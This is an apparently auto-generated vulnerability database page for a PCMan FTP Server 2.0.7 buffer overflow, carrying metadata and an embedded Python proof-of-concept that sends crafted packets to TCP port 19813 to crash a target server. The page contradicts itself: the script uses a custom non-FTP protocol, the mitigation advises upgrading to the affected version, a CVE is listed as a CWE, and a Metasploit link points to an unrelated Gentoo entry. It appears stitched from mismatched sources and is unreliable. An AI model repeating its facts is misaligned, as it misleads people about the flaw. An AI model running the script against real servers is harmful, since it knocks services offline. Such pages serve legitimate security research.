Remote Buffer Overflow in PCMan FTP Server 2.0.7

vendor:

PCMan FTP Server

by:

Exploit-DB

9,3

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: PCMan FTP Server

Affected Version From: 2.0.7

Affected Version To: 2.0.7

Patch Exists: YES

Related CWE: CVE-2008-4194

CPE: a:hk_pcman:pcman_ftp_server

Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2008-4194/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Remote Buffer Overflow in PCMan FTP Server 2.0.7

A remote buffer overflow vulnerability exists in PCMan FTP Server 2.0.7. The vulnerability is caused due to a boundary error within the handling of FTP commands. This can be exploited to cause a stack-based buffer overflow by sending an overly long, specially-crafted FTP command to the affected server. Successful exploitation may allow execution of arbitrary code.

Mitigation:

Upgrade to version 2.0.7 or later.

Source

Exploit-DB raw data:

#!/usr/bin/python

import socket,struct,sys,os

SIGN=0x04030201
cmd=0x01000000

def main():
	if len(sys.argv)!=2:
		print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n"
		sys.exit(0)
	
	else:
		host=sys.argv[1],19813	#default port TCP/19813

	if sys.platform=="win32":
	    os.system("cls")
	else:
	    os.system("clear")
	
	s=socket.socket()
	try:
		s.connect(host)
		s.recv(1024)
	except:
		print"[x] Error connecting to remote host! This is g00d :D."
		sys.exit(0)
	print"[+] Building crafted packets..."
	#packet negotiation request
	pktnego=struct.pack(">L",cmd+0x1)		#+0
	pktnego+=struct.pack("<L",0x00000000)		#+4
	pktnego+=struct.pack("<L",SIGN)			#+8 (signature)
	#packet crash
	pkt1=struct.pack("<L",cmd+0x2)
	pkt1+=struct.pack(">L",0x00000001)		# != 0x0
	pkt1+=struct.pack("<L",SIGN)
	#end	
	print"[+] Negotiation."
	s.send(pktnego)
	s.recv(1024)
	s.send(pkt1)#crash!
	s.close()

if __name__=="__main__":
	main()
#PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15214.zip